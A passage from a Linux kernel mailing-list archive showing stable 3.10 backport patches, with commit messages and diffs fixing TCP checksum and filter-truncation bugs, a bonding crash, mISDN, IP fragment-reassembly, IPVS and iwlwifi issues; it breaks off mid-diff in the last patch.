                   ` (84 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Douglas Caetano dos Santos, David S . Miller, Willy Tarreau

From: Douglas Caetano dos Santos <douglascs@taghos.com.br>

commit 2fe664f1fcf7c4da6891f95708a7a56d3c024354 upstream.

With TCP MTU probing enabled and offload TX checksumming disabled,
tcp_mtu_probe() calculated the wrong checksum when a fragment being copied
into the probe's SKB had an odd length. This was caused by the direct use
of skb_copy_and_csum_bits() to calculate the checksum, as it pads the
fragment being copied, if needed. When this fragment was not the last, a
subsequent call used the previous checksum without considering this
padding.

The effect was a stale connection in one way, as even retransmissions
wouldn't solve the problem, because the checksum was never recalculated for
the full SKB length.

Signed-off-by: Douglas Caetano dos Santos <douglascs@taghos.com.br>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/tcp_output.c | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
index 465285b..1f2f6b5 100644
--- a/net/ipv4/tcp_output.c
+++ b/net/ipv4/tcp_output.c
@@ -1753,12 +1753,14 @@ static int tcp_mtu_probe(struct sock *sk)
 	len = 0;
 	tcp_for_write_queue_from_safe(skb, next, sk) {
 		copy = min_t(int, skb->len, probe_size - len);
-		if (nskb->ip_summed)
+		if (nskb->ip_summed) {
 			skb_copy_bits(skb, 0, skb_put(nskb, copy), copy);
-		else
-			nskb->csum = skb_copy_and_csum_bits(skb, 0,
-							    skb_put(nskb, copy),
-							    copy, nskb->csum);
+		} else {
+			__wsum csum = skb_copy_and_csum_bits(skb, 0,
+							     skb_put(nskb, copy),
+							     copy, 0);
+			nskb->csum = csum_block_add(nskb->csum, csum, len);
+		}
 
 		if (skb->len <= copy) {
 			/* We've eaten all the data from this skb.
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 235/319] tcp: take care of truncations done by sk_filter()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (133 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 234/319] tcp: fix wrong checksum calculation on MTU probing Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 236/319] bonding: Fix bonding crash Willy Tarreau
                   ` (83 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit ac6e780070e30e4c35bd395acfe9191e6268bdd3 upstream.

With syzkaller help, Marco Grassi found a bug in TCP stack,
crashing in tcp_collapse()

Root cause is that sk_filter() can truncate the incoming skb,
but TCP stack was not really expecting this to happen.
It probably was expecting a simple DROP or ACCEPT behavior.

We first need to make sure no part of TCP header could be removed.
Then we need to adjust TCP_SKB_CB(skb)->end_seq

Many thanks to syzkaller team and Marco for giving us a reproducer.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Marco Grassi <marco.gra@gmail.com>
Reported-by: Vladis Dronov <vdronov@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/filter.h |  6 +++++-
 include/net/tcp.h      |  1 +
 net/core/filter.c      | 10 +++++-----
 net/ipv4/tcp_ipv4.c    | 19 ++++++++++++++++++-
 net/ipv6/tcp_ipv6.c    |  6 ++++--
 5 files changed, 33 insertions(+), 9 deletions(-)

diff --git a/include/linux/filter.h b/include/linux/filter.h
index f65f5a6..c2bea01 100644
--- a/include/linux/filter.h
+++ b/include/linux/filter.h
@@ -36,7 +36,11 @@ static inline unsigned int sk_filter_len(const struct sk_filter *fp)
 	return fp->len * sizeof(struct sock_filter) + sizeof(*fp);
 }
 
-extern int sk_filter(struct sock *sk, struct sk_buff *skb);
+int sk_filter_trim_cap(struct sock *sk, struct sk_buff *skb, unsigned int cap);
+static inline int sk_filter(struct sock *sk, struct sk_buff *skb)
+{
+	return sk_filter_trim_cap(sk, skb, 1);
+}
 extern unsigned int sk_run_filter(const struct sk_buff *skb,
 				  const struct sock_filter *filter);
 extern int sk_unattached_filter_create(struct sk_filter **pfp,
diff --git a/include/net/tcp.h b/include/net/tcp.h
index 1c5e037..79cd118 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -1029,6 +1029,7 @@ static inline void tcp_prequeue_init(struct tcp_sock *tp)
 }
 
 extern bool tcp_prequeue(struct sock *sk, struct sk_buff *skb);
+int tcp_filter(struct sock *sk, struct sk_buff *skb);
 
 #undef STATE_TRACE
 
diff --git a/net/core/filter.c b/net/core/filter.c
index c6c18d8..65f2a65 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -67,9 +67,10 @@ static inline void *load_pointer(const struct sk_buff *skb, int k,
 }
 
 /**
- *	sk_filter - run a packet through a socket filter
+ *	sk_filter_trim_cap - run a packet through a socket filter
  *	@sk: sock associated with &sk_buff
  *	@skb: buffer to filter
+ *	@cap: limit on how short the eBPF program may trim the packet
  *
  * Run the filter code and then cut skb->data to correct size returned by
  * sk_run_filter. If pkt_len is 0 we toss packet. If skb->len is smaller
@@ -78,7 +79,7 @@ static inline void *load_pointer(const struct sk_buff *skb, int k,
  * be accepted or -EPERM if the packet should be tossed.
  *
  */
-int sk_filter(struct sock *sk, struct sk_buff *skb)
+int sk_filter_trim_cap(struct sock *sk, struct sk_buff *skb, unsigned int cap)
 {
 	int err;
 	struct sk_filter *filter;
@@ -99,14 +100,13 @@ int sk_filter(struct sock *sk, struct sk_buff *skb)
 	filter = rcu_dereference(sk->sk_filter);
 	if (filter) {
 		unsigned int pkt_len = SK_RUN_FILTER(filter, skb);
-
-		err = pkt_len ? pskb_trim(skb, pkt_len) : -EPERM;
+		err = pkt_len ? pskb_trim(skb, max(cap, pkt_len)) : -EPERM;
 	}
 	rcu_read_unlock();
 
 	return err;
 }
-EXPORT_SYMBOL(sk_filter);
+EXPORT_SYMBOL(sk_filter_trim_cap);
 
 /**
  *	sk_run_filter - run a filter on a socket
diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
index 5401fbf..6504a08 100644
--- a/net/ipv4/tcp_ipv4.c
+++ b/net/ipv4/tcp_ipv4.c
@@ -1959,6 +1959,21 @@ bool tcp_prequeue(struct sock *sk, struct sk_buff *skb)
 }
 EXPORT_SYMBOL(tcp_prequeue);
 
+int tcp_filter(struct sock *sk, struct sk_buff *skb)
+{
+	struct tcphdr *th = (struct tcphdr *)skb->data;
+	unsigned int eaten = skb->len;
+	int err;
+
+	err = sk_filter_trim_cap(sk, skb, th->doff * 4);
+	if (!err) {
+		eaten -= skb->len;
+		TCP_SKB_CB(skb)->end_seq -= eaten;
+	}
+	return err;
+}
+EXPORT_SYMBOL(tcp_filter);
+
 /*
  *	From tcp_input.c
  */
@@ -2021,8 +2036,10 @@ process:
 		goto discard_and_relse;
 	nf_reset(skb);
 
-	if (sk_filter(sk, skb))
+	if (tcp_filter(sk, skb))
 		goto discard_and_relse;
+	th = (const struct tcphdr *)skb->data;
+	iph = ip_hdr(skb);
 
 	skb->dev = NULL;
 
diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
index d823738..70b10ed 100644
--- a/net/ipv6/tcp_ipv6.c
+++ b/net/ipv6/tcp_ipv6.c
@@ -1330,7 +1330,7 @@ static int tcp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
 		goto discard;
 #endif
 
-	if (sk_filter(sk, skb))
+	if (tcp_filter(sk, skb))
 		goto discard;
 
 	/*
@@ -1501,8 +1501,10 @@ process:
 	if (!xfrm6_policy_check(sk, XFRM_POLICY_IN, skb))
 		goto discard_and_relse;
 
-	if (sk_filter(sk, skb))
+	if (tcp_filter(sk, skb))
 		goto discard_and_relse;
+	th = (const struct tcphdr *)skb->data;
+	hdr = ipv6_hdr(skb);
 
 	skb->dev = NULL;
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 236/319] bonding: Fix bonding crash
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (134 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 235/319] tcp: take care of truncations done by sk_filter() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 237/319] net: ratelimit warnings about dst entry refcount underflow or overflow Willy Tarreau
                   ` (82 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mahesh Bandewar, David S . Miller, Willy Tarreau

From: Mahesh Bandewar <maheshb@google.com>

commit 24b27fc4cdf9e10c5e79e5923b6b7c2c5c95096c upstream.

Following few steps will crash kernel -

  (a) Create bonding master
      > modprobe bonding miimon=50
  (b) Create macvlan bridge on eth2
      > ip link add link eth2 dev mvl0 address aa:0:0:0:0:01 \
	   type macvlan
  (c) Now try adding eth2 into the bond
      > echo +eth2 > /sys/class/net/bond0/bonding/slaves
      <crash>

Bonding does lots of things before checking if the device enslaved is
busy or not.

In this case when the notifier call-chain sends notifications, the
bond_netdev_event() assumes that the rx_handler /rx_handler_data is
registered while the bond_enslave() hasn't progressed far enough to
register rx_handler for the new slave.

This patch adds a rx_handler check that can be performed right at the
beginning of the enslave code to avoid getting into this situation.

Signed-off-by: Mahesh Bandewar <maheshb@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/bonding/bond_main.c |  7 ++++---
 include/linux/netdevice.h       |  1 +
 net/core/dev.c                  | 16 ++++++++++++++++
 3 files changed, 21 insertions(+), 3 deletions(-)

diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
index c0ed7c8..ce41616 100644
--- a/drivers/net/bonding/bond_main.c
+++ b/drivers/net/bonding/bond_main.c
@@ -1565,9 +1565,10 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev)
 			   bond_dev->name, slave_dev->name);
 	}
 
-	/* already enslaved */
-	if (slave_dev->flags & IFF_SLAVE) {
-		pr_debug("Error, Device was already enslaved\n");
+	/* already in-use? */
+	if (netdev_is_rx_handler_busy(slave_dev)) {
+		netdev_err(bond_dev,
+			   "Error: Device is in use and cannot be enslaved\n");
 		return -EBUSY;
 	}
 
diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 4d2e041..45a618b 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -2223,6 +2223,7 @@ static inline void napi_free_frags(struct napi_struct *napi)
 	napi->skb = NULL;
 }
 
+bool netdev_is_rx_handler_busy(struct net_device *dev);
 extern int netdev_rx_handler_register(struct net_device *dev,
 				      rx_handler_func_t *rx_handler,
 				      void *rx_handler_data);
diff --git a/net/core/dev.c b/net/core/dev.c
index 1ccfc49..408f6ee 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -3346,6 +3346,22 @@ out:
 #endif
 
 /**
+ *	netdev_is_rx_handler_busy - check if receive handler is registered
+ *	@dev: device to check
+ *
+ *	Check if a receive handler is already registered for a given device.
+ *	Return true if there one.
+ *
+ *	The caller must hold the rtnl_mutex.
+ */
+bool netdev_is_rx_handler_busy(struct net_device *dev)
+{
+	ASSERT_RTNL();
+	return dev && rtnl_dereference(dev->rx_handler);
+}
+EXPORT_SYMBOL_GPL(netdev_is_rx_handler_busy);
+
+/**
  *	netdev_rx_handler_register - register receive handler
  *	@dev: device to register a handler for
  *	@rx_handler: receive handler to register
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 237/319] net: ratelimit warnings about dst entry refcount underflow or overflow
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (135 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 236/319] bonding: Fix bonding crash Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 238/319] mISDN: Support DR6 indication in mISDNipac driver Willy Tarreau
                   ` (81 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Konstantin Khlebnikov, David S . Miller, Willy Tarreau

From: Konstantin Khlebnikov <khlebnikov@yandex-team.ru>

commit 8bf4ada2e21378816b28205427ee6b0e1ca4c5f1 upstream.

Kernel generates a lot of warnings when dst entry reference counter
overflows and becomes negative. That bug was seen several times at
machines with outdated 3.10.y kernels. Most like it's already fixed
in upstream. Anyway that flood completely kills machine and makes
further debugging impossible.

Signed-off-by: Konstantin Khlebnikov <khlebnikov@yandex-team.ru>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/core/dst.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/net/core/dst.c b/net/core/dst.c
index 1bf6842..582b861 100644
--- a/net/core/dst.c
+++ b/net/core/dst.c
@@ -283,7 +283,9 @@ void dst_release(struct dst_entry *dst)
 		unsigned short nocache = dst->flags & DST_NOCACHE;
 
 		newrefcnt = atomic_dec_return(&dst->__refcnt);
-		WARN_ON(newrefcnt < 0);
+		if (unlikely(newrefcnt < 0))
+			net_warn_ratelimited("%s: dst:%p refcnt:%d\n",
+					     __func__, dst, newrefcnt);
 		if (!newrefcnt && unlikely(nocache))
 			call_rcu(&dst->rcu_head, dst_destroy_rcu);
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 238/319] mISDN: Support DR6 indication in mISDNipac driver
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (136 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 237/319] net: ratelimit warnings about dst entry refcount underflow or overflow Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 239/319] mISDN: Fixing missing validation in base_sock_bind() Willy Tarreau
                   ` (80 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Maciej S. Szmigiero, David S . Miller, Willy Tarreau

From: "Maciej S. Szmigiero" <mail@maciej.szmigiero.name>

commit 1e1589ad8b5cb5b8a6781ba5850cf710ada0e919 upstream.

According to figure 39 in PEB3086 data sheet, version 1.4 this indication
replaces DR when layer 1 transition source state is F6.

This fixes mISDN layer 1 getting stuck in F6 state in TE mode on
Dialogic Diva 2.02 card (and possibly others) when NT deactivates it.

Signed-off-by: Maciej S. Szmigiero <mail@maciej.szmigiero.name>
Acked-by: Karsten Keil <keil@b1-systems.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/isdn/hardware/mISDN/ipac.h      | 1 +
 drivers/isdn/hardware/mISDN/mISDNipac.c | 2 ++
 2 files changed, 3 insertions(+)

diff --git a/drivers/isdn/hardware/mISDN/ipac.h b/drivers/isdn/hardware/mISDN/ipac.h
index 8121e04..31fb3b0 100644
--- a/drivers/isdn/hardware/mISDN/ipac.h
+++ b/drivers/isdn/hardware/mISDN/ipac.h
@@ -217,6 +217,7 @@ struct ipac_hw {
 #define ISAC_IND_DR		0x0
 #define ISAC_IND_SD		0x2
 #define ISAC_IND_DIS		0x3
+#define ISAC_IND_DR6		0x5
 #define ISAC_IND_EI		0x6
 #define ISAC_IND_RSY		0x4
 #define ISAC_IND_ARD		0x8
diff --git a/drivers/isdn/hardware/mISDN/mISDNipac.c b/drivers/isdn/hardware/mISDN/mISDNipac.c
index ccd7d85..bac920c 100644
--- a/drivers/isdn/hardware/mISDN/mISDNipac.c
+++ b/drivers/isdn/hardware/mISDN/mISDNipac.c
@@ -80,6 +80,7 @@ isac_ph_state_bh(struct dchannel *dch)
 		l1_event(dch->l1, HW_DEACT_CNF);
 		break;
 	case ISAC_IND_DR:
+	case ISAC_IND_DR6:
 		dch->state = 3;
 		l1_event(dch->l1, HW_DEACT_IND);
 		break;
@@ -660,6 +661,7 @@ isac_l1cmd(struct dchannel *dch, u32 cmd)
 		spin_lock_irqsave(isac->hwlock, flags);
 		if ((isac->state == ISAC_IND_EI) ||
 		    (isac->state == ISAC_IND_DR) ||
+		    (isac->state == ISAC_IND_DR6) ||
 		    (isac->state == ISAC_IND_RS))
 			ph_command(isac, ISAC_CMD_TIM);
 		else
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 239/319] mISDN: Fixing missing validation in base_sock_bind()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (137 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 238/319] mISDN: Support DR6 indication in mISDNipac driver Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 240/319] net: disable fragment reassembly if high_thresh is set to zero Willy Tarreau
                   ` (79 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Emrah Demir, David S . Miller, Willy Tarreau

From: Emrah Demir <ed@abdsec.com>

commit b821646826e22f0491708768fccce58eef3f5704 upstream.

Add validation code into mISDN/socket.c

Signed-off-by: Emrah Demir <ed@abdsec.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/isdn/mISDN/socket.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/isdn/mISDN/socket.c b/drivers/isdn/mISDN/socket.c
index 5cefb47..00bd80a 100644
--- a/drivers/isdn/mISDN/socket.c
+++ b/drivers/isdn/mISDN/socket.c
@@ -717,6 +717,9 @@ base_sock_bind(struct socket *sock, struct sockaddr *addr, int addr_len)
 	if (!maddr || maddr->family != AF_ISDN)
 		return -EINVAL;
 
+	if (addr_len < sizeof(struct sockaddr_mISDN))
+		return -EINVAL;
+
 	lock_sock(sk);
 
 	if (_pms(sk)->dev) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 240/319] net: disable fragment reassembly if high_thresh is set to zero
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (138 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 239/319] mISDN: Fixing missing validation in base_sock_bind() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 241/319] ipvs: count pre-established TCP states as active Willy Tarreau
                   ` (78 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Michal Kubecek, Jiri Slaby, Willy Tarreau

From: Michal Kubecek <mkubecek@suse.cz>

commit 30759219f562cfaaebe7b9c1d1c0e6b5445c69b0 upstream.

Before commit 6d7b857d541e ("net: use lib/percpu_counter API for
fragmentation mem accounting"), setting high threshold to 0 prevented
fragment reassembly as first fragment would be always evicted before
second could be added to the queue. While inefficient, some users
apparently relied on it.

Since the commit mentioned above, a percpu counter is used for
reassembly memory accounting and high batch size avoids taking slow path
in most common scenarios. As a result, a whole full sized packet can be
reassembled without the percpu counter's main counter changing its
value so that even with high_thresh set to 0, fragmented packets can be
still reassembled and processed.

Add explicit checks preventing reassembly if high threshold is zero.

[mk] backport to 3.12

Signed-off-by: Michal Kubecek <mkubecek@suse.cz>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/ip_fragment.c                  | 4 ++++
 net/ipv6/netfilter/nf_conntrack_reasm.c | 3 +++
 net/ipv6/reassembly.c                   | 4 ++++
 3 files changed, 11 insertions(+)

diff --git a/net/ipv4/ip_fragment.c b/net/ipv4/ip_fragment.c
index 4d98a6b..04c7e46 100644
--- a/net/ipv4/ip_fragment.c
+++ b/net/ipv4/ip_fragment.c
@@ -656,6 +656,9 @@ int ip_defrag(struct sk_buff *skb, u32 user)
 	net = skb->dev ? dev_net(skb->dev) : dev_net(skb_dst(skb)->dev);
 	IP_INC_STATS_BH(net, IPSTATS_MIB_REASMREQDS);
 
+	if (!net->ipv4.frags.high_thresh)
+		goto fail;
+
 	/* Start by cleaning up the memory. */
 	ip_evictor(net);
 
@@ -672,6 +675,7 @@ int ip_defrag(struct sk_buff *skb, u32 user)
 		return ret;
 	}
 
+fail:
 	IP_INC_STATS_BH(net, IPSTATS_MIB_REASMFAILS);
 	kfree_skb(skb);
 	return -ENOMEM;
diff --git a/net/ipv6/netfilter/nf_conntrack_reasm.c b/net/ipv6/netfilter/nf_conntrack_reasm.c
index 7cd6235..c11a40c 100644
--- a/net/ipv6/netfilter/nf_conntrack_reasm.c
+++ b/net/ipv6/netfilter/nf_conntrack_reasm.c
@@ -569,6 +569,9 @@ struct sk_buff *nf_ct_frag6_gather(struct sk_buff *skb, u32 user)
 	if (find_prev_fhdr(skb, &prevhdr, &nhoff, &fhoff) < 0)
 		return skb;
 
+	if (!net->nf_frag.frags.high_thresh)
+		return skb;
+
 	clone = skb_clone(skb, GFP_ATOMIC);
 	if (clone == NULL) {
 		pr_debug("Can't clone skb\n");
diff --git a/net/ipv6/reassembly.c b/net/ipv6/reassembly.c
index a1fb511..1a5318e 100644
--- a/net/ipv6/reassembly.c
+++ b/net/ipv6/reassembly.c
@@ -556,6 +556,9 @@ static int ipv6_frag_rcv(struct sk_buff *skb)
 		return 1;
 	}
 
+	if (!net->ipv6.frags.high_thresh)
+		goto fail_mem;
+
 	evicted = inet_frag_evictor(&net->ipv6.frags, &ip6_frags, false);
 	if (evicted)
 		IP6_ADD_STATS_BH(net, ip6_dst_idev(skb_dst(skb)),
@@ -575,6 +578,7 @@ static int ipv6_frag_rcv(struct sk_buff *skb)
 		return ret;
 	}
 
+fail_mem:
 	IP6_INC_STATS_BH(net, ip6_dst_idev(skb_dst(skb)), IPSTATS_MIB_REASMFAILS);
 	kfree_skb(skb);
 	return -1;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 241/319] ipvs: count pre-established TCP states as active
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (139 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 240/319] net: disable fragment reassembly if high_thresh is set to zero Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 242/319] iwlwifi: pcie: fix access to scratch buffer Willy Tarreau
                   ` (77 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Michal Kubecek, Simon Horman, Willy Tarreau

From: Michal Kubecek <mkubecek@suse.cz>

commit be2cef49904b34dd5f75d96bbc8cd8341bab1bc0 upstream.

Some users observed that "least connection" distribution algorithm doesn't
handle well bursts of TCP connections from reconnecting clients after
a node or network failure.

This is because the algorithm counts active connection as worth 256
inactive ones where for TCP, "active" only means TCP connections in
ESTABLISHED state. In case of a connection burst, new connections are
handled before previous ones have finished the three way handshaking so
that all are still counted as "inactive", i.e. cheap ones. The become
"active" quickly but at that time, all of them are already assigned to one
real server (or few), resulting in highly unbalanced distribution.

Address this by counting the "pre-established" states as "active".

Signed-off-by: Michal Kubecek <mkubecek@suse.cz>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/netfilter/ipvs/ip_vs_proto_tcp.c | 25 +++++++++++++++++++++++--
 1 file changed, 23 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/ipvs/ip_vs_proto_tcp.c b/net/netfilter/ipvs/ip_vs_proto_tcp.c
index 50a1594..3032ede 100644
--- a/net/netfilter/ipvs/ip_vs_proto_tcp.c
+++ b/net/netfilter/ipvs/ip_vs_proto_tcp.c
@@ -373,6 +373,20 @@ static const char *const tcp_state_name_table[IP_VS_TCP_S_LAST+1] = {
 	[IP_VS_TCP_S_LAST]		=	"BUG!",
 };
 
+static const bool tcp_state_active_table[IP_VS_TCP_S_LAST] = {
+	[IP_VS_TCP_S_NONE]		=	false,
+	[IP_VS_TCP_S_ESTABLISHED]	=	true,
+	[IP_VS_TCP_S_SYN_SENT]		=	true,
+	[IP_VS_TCP_S_SYN_RECV]		=	true,
+	[IP_VS_TCP_S_FIN_WAIT]		=	false,
+	[IP_VS_TCP_S_TIME_WAIT]		=	false,
+	[IP_VS_TCP_S_CLOSE]		=	false,
+	[IP_VS_TCP_S_CLOSE_WAIT]	=	false,
+	[IP_VS_TCP_S_LAST_ACK]		=	false,
+	[IP_VS_TCP_S_LISTEN]		=	false,
+	[IP_VS_TCP_S_SYNACK]		=	true,
+};
+
 #define sNO IP_VS_TCP_S_NONE
 #define sES IP_VS_TCP_S_ESTABLISHED
 #define sSS IP_VS_TCP_S_SYN_SENT
@@ -396,6 +410,13 @@ static const char * tcp_state_name(int state)
 	return tcp_state_name_table[state] ? tcp_state_name_table[state] : "?";
 }
 
+static bool tcp_state_active(int state)
+{
+	if (state >= IP_VS_TCP_S_LAST)
+		return false;
+	return tcp_state_active_table[state];
+}
+
 static struct tcp_states_t tcp_states [] = {
 /*	INPUT */
 /*        sNO, sES, sSS, sSR, sFW, sTW, sCL, sCW, sLA, sLI, sSA	*/
@@ -518,12 +539,12 @@ set_tcp_state(struct ip_vs_proto_data *pd, struct ip_vs_conn *cp,
 
 		if (dest) {
 			if (!(cp->flags & IP_VS_CONN_F_INACTIVE) &&
-			    (new_state != IP_VS_TCP_S_ESTABLISHED)) {
+			    !tcp_state_active(new_state)) {
 				atomic_dec(&dest->activeconns);
 				atomic_inc(&dest->inactconns);
 				cp->flags |= IP_VS_CONN_F_INACTIVE;
 			} else if ((cp->flags & IP_VS_CONN_F_INACTIVE) &&
-				   (new_state == IP_VS_TCP_S_ESTABLISHED)) {
+				   tcp_state_active(new_state)) {
 				atomic_inc(&dest->activeconns);
 				atomic_dec(&dest->inactconns);
 				cp->flags &= ~IP_VS_CONN_F_INACTIVE;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 242/319] iwlwifi: pcie: fix access to scratch buffer
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (140 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 241/319] ipvs: count pre-established TCP states as active Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 243/319] svc: Avoid garbage replies when pc_func() returns rpc_drop_reply Willy Tarreau
                   ` (76 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Sara Sharon, Luca Coelho, Willy Tarreau

From: Sara Sharon <sara.sharon@intel.com>

commit d5d0689aefc59c6a5352ca25d7e6d47d03f543ce upstream.

This fixes a pretty ancient bug that hasn't manifested itself
until now.
The scratchbuf for command queue is allocated only for 32 slots
but is accessed with the queue write pointer - which can be
up to 256.
Since the scratch buf size was 16 and there are up to 256 TFDs
we never passed a page boundary when accessing the scratch buffer,
but when attempting to increase the size of the scratch buffer a
panic was quick to follow when trying to access the address resulted
in a page boundary.

Signed-off-by: Sara Sharon <sara.sharon@intel.com>
Fixes: 38c0f334b359 ("iwlwifi: use coherent DMA memory for command header")
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/wireless/iwlwifi/pcie/tx.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/wireless/iwlwifi/pcie/tx.c b/drivers/net/wireless/iwlwifi/pcie/tx.c
index f05962c..2e3a0d7 100644
--- a/drivers/net/wireless/iwlwifi/pcie/tx.c
+++ b/drivers/net/wireless/iwlwifi/pcie/tx.c
@@ -1311,9 +1311,9 @@ static int iwl_pcie_enqueue_hcmd(struct iwl_trans *trans,
 
 	/* start the TFD with the scratchbuf */
 	scratch_size = min_t(int, copy_size, IWL_HCMD_SCRATCHBUF_SIZE);
-	memcpy(&txq->scratchbufs[q->write_ptr], &out_cmd->hdr, scratch_size);
